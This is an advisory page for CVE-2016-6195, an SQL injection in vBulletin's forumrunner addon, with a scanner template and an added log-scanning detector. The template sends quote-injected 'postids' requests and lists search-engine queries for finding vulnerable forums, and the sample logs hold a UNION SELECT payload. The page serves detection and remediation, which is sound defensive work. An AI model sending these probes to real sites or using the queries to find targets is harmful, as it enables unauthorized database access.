CVE-2016-6195: vBulletin <= 4.2.3 - SQL Injection

Date: 2025-08-01 | Affected software: vBulletin | PoC: public

Vulnerability description

vBulletin versions 3.6.0 through 4.2.3 contain an SQL injection vulnerability in the forumrunner addon of the vBulletin core. An attacker can execute arbitrary SQL queries and potentially access sensitive information from the database.

PoC code [public]

id: CVE-2016-6195

info:
  name: vBulletin <= 4.2.3 - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
  remediation: |
    Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor.
  reference:
    - https://www.cvedetails.com/cve/CVE-2016-6195/
    - https://www.exploit-db.com/exploits/38489
    - https://enumerated.wordpress.com/2016/07/11/1/
    - http://www.vbulletin.org/forum/showthread.php?t=322848
    - https://github.com/drewlong/vbully
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-6195
    cwe-id: CWE-89
    epss-score: 0.8643
    epss-percentile: 0.99372
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 6
    vendor: vbulletin
    product: vbulletin
    shodan-query:
      - title:"Powered By vBulletin"
      - http.html:"powered by vbulletin"
      - http.component:"vbulletin"
      - http.title:"powered by vbulletin"
      - cpe:"cpe:2.3:a:vbulletin:vbulletin"
    fofa-query:
      - body="powered by vbulletin"
      - title="powered by vbulletin"
    google-query:
      - intext:"powered by vbulletin"
      - intitle:"powered by vbulletin"
  tags: cve2016,cve,vbulletin,sqli,forum,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"

    stop-at-first-match: true
    host-redirects: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "type=dberror"

      - type: status
        status:
          - 200
          - 503
        condition: or
# digest: 4a0a00473045022100b9a3977d0f6982848a0721f1a122fdb00bbcd4470b05c3c123d62d2da6dc72e302206e2172f92bcd66a085871d087611f381134f194f3004bc264dc99be3a08ae947:922c64590222798bb761d5b6d8e72950
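
A defender-side check for the request pattern the template above sends, as an added example that is not part of the original page or the template author's code: it scans web access logs for forumrunner/request.php calls with cmd=get_spam_data whose postids value is not a plain list of numbers. The log lines are constructed, and treating legitimate postids values as comma-separated integers is an assumption, not something the page states.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Aug/2025:10:00:01 +0000] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 503 512 "-" "scanner"
203.0.113.9 - - [01/Aug/2025:10:00:05 +0000] "GET /forumrunner/request.php?cmd=get_spam_data&postids=101,102 HTTP/1.1" 200 230 "-" "app"
203.0.113.9 - - [01/Aug/2025:10:00:09 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 9001 "-" "browser"
192.0.2.44 - - [01/Aug/2025:10:01:12 +0000] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=1%20UNION%20SELECT%201 HTTP/1.1" 200 77 "-" "curl"
"""

# client, timestamp, method, request target, status code
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: a legitimate postids value is a comma-separated list of integers.
SAFE_POSTIDS = re.compile(r'\d+(,\d+)*')


def suspicious_requests(log_text):
    """Return one finding per get_spam_data request with a non-numeric postids."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, _method, target, status = m.groups()
        url = urlsplit(target)
        # The template tries several install prefixes; match on the path suffix.
        if not url.path.lower().endswith("/forumrunner/request.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
        if "get_spam_data" not in params.get("cmd", []):
            continue
        for value in params.get("postids", []):
            if not SAFE_POSTIDS.fullmatch(value):
                findings.append({"client": client, "time": when, "path": url.path,
                                 "postids": value, "status": int(status)})
    return findings


if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

Only the query string is inspected, so parameters sent in a POST body will not appear in a standard access log and need a WAF or application-level log instead.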
